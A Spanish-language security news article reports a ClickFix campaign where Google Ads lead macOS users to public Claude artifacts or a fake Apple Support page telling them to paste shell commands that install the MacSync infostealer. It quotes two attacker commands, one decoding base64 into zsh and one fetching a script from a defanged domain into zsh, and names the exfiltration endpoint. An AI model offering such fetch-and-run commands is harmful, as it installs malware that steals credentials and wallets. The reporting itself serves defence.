Artefactos de Claude LLM utilizados ataques ClickFix en Mac ~ Segu-Info

Los actores de amenazas están abusando de los artefactos de Claude y de Google
Ads en campañas de
ClickFix
que distribuyen malware de robo de información a usuarios de macOS que buscan
consultas específicas.

Un artefacto de Claude es contenido generado con LLM de Antropic, publicado
por su autor. Puede ser cualquier cosa, desde instrucciones, guías, fragmentos
de código u otros tipos de resultados aislados del chat principal y accesibles
para cualquier persona a través de enlaces alojados en el dominio
claude.ai.

La página de un artefacto advierte a los usuarios que el contenido mostrado
fue generado por el usuario y no se ha verificado su exactitud.
Se han observado al menos dos variantes de esta actividad maliciosa en la
red, y más de 10.000 usuarios han accedido al contenido con instrucciones
peligrosas.

Investigadores de Moonlock Lab, la división de investigación de MacPaw, y de
AdGuard, empresa de bloqueo de anuncios,
observaron
que se mostraban resultados de búsqueda maliciosos para múltiples consultas,
como «online DNS resolver», «macOS CLI disk space analyzer» y
«HomeBrew».

Los investigadores de Moonlock descubrieron que la guía maliciosa de Claude ya
ha recibido al menos 15.600 visitas, lo que podría indicar la cantidad de
usuarios que caen en la trampa. Los investigadores de AdGuard observaron la
misma guía unos días antes, cuando tenía 12.300 visitas.

Los resultados maliciosos promocionados en la búsqueda de Google conducen a un
artefacto público de Claude o a un artículo de Medium que suplanta al Soporte
Técnico de Apple. En ambos casos, se indica al usuario que pegue un comando de
shell en la Terminal.

  • En la primera variante del ataque, el comando de ejecución es:
    'echo "..." | base64 -D | zsh,'
  • La segunda variante es:
    'true && cur""l -SsLfk --compressed
    "https://raxelpak[.]com/curl/[hash]" | zsh'
    .

Al ejecutar el comando en la Terminal, se obtiene un cargador de malware para
el
infostealer MacSync, que exfiltra información confidencial del sistema.

Según los investigadores, el malware establece comunicación con la
infraestructura de comando y control (C2) mediante un token codificado y una
clave API, y suplanta un agente de usuario del navegador macOS para integrarse
en la actividad normal. «La respuesta se envía directamente a osascript; AppleScript se encarga del
robo (llavero, datos del navegador, monederos de criptomonedas)»
, afirman los investigadores.

Los datos robados se empaquetan en un archivo comprimido en
‘/tmp/osalogging.zip’ y luego se exfiltran al C2 del atacante en
a2abotnet[.]com/gate mediante una solicitud HTTP POST. En caso de
fallo, el archivo comprimido se divide en fragmentos más pequeños y la
exfiltración se reintenta ocho veces. Tras una carga exitosa, un paso de
limpieza elimina todos los rastros.

MoonLock Lab descubrió que ambas variantes obtienen la segunda etapa de la
misma dirección C2, lo que indica que el mismo actor de amenazas está detrás
de la actividad observada.

Una
campaña similar
aprovechó la función para compartir chats en ChatGPT y Grok para distribuir el
robo de información AMOS. En diciembre de 2025, los investigadores
descubrieron que se promovía después de descubrir que las conversaciones de
ChatGPT y Grok se estaban utilizando en ataques ClickFix dirigidos a usuarios
de Mac.

Se recomienda a los usuarios tener precaución y evitar ejecutar comandos en la
Terminal que no comprendan completamente. 

Fuente:
BC


Ver fuente

Related Post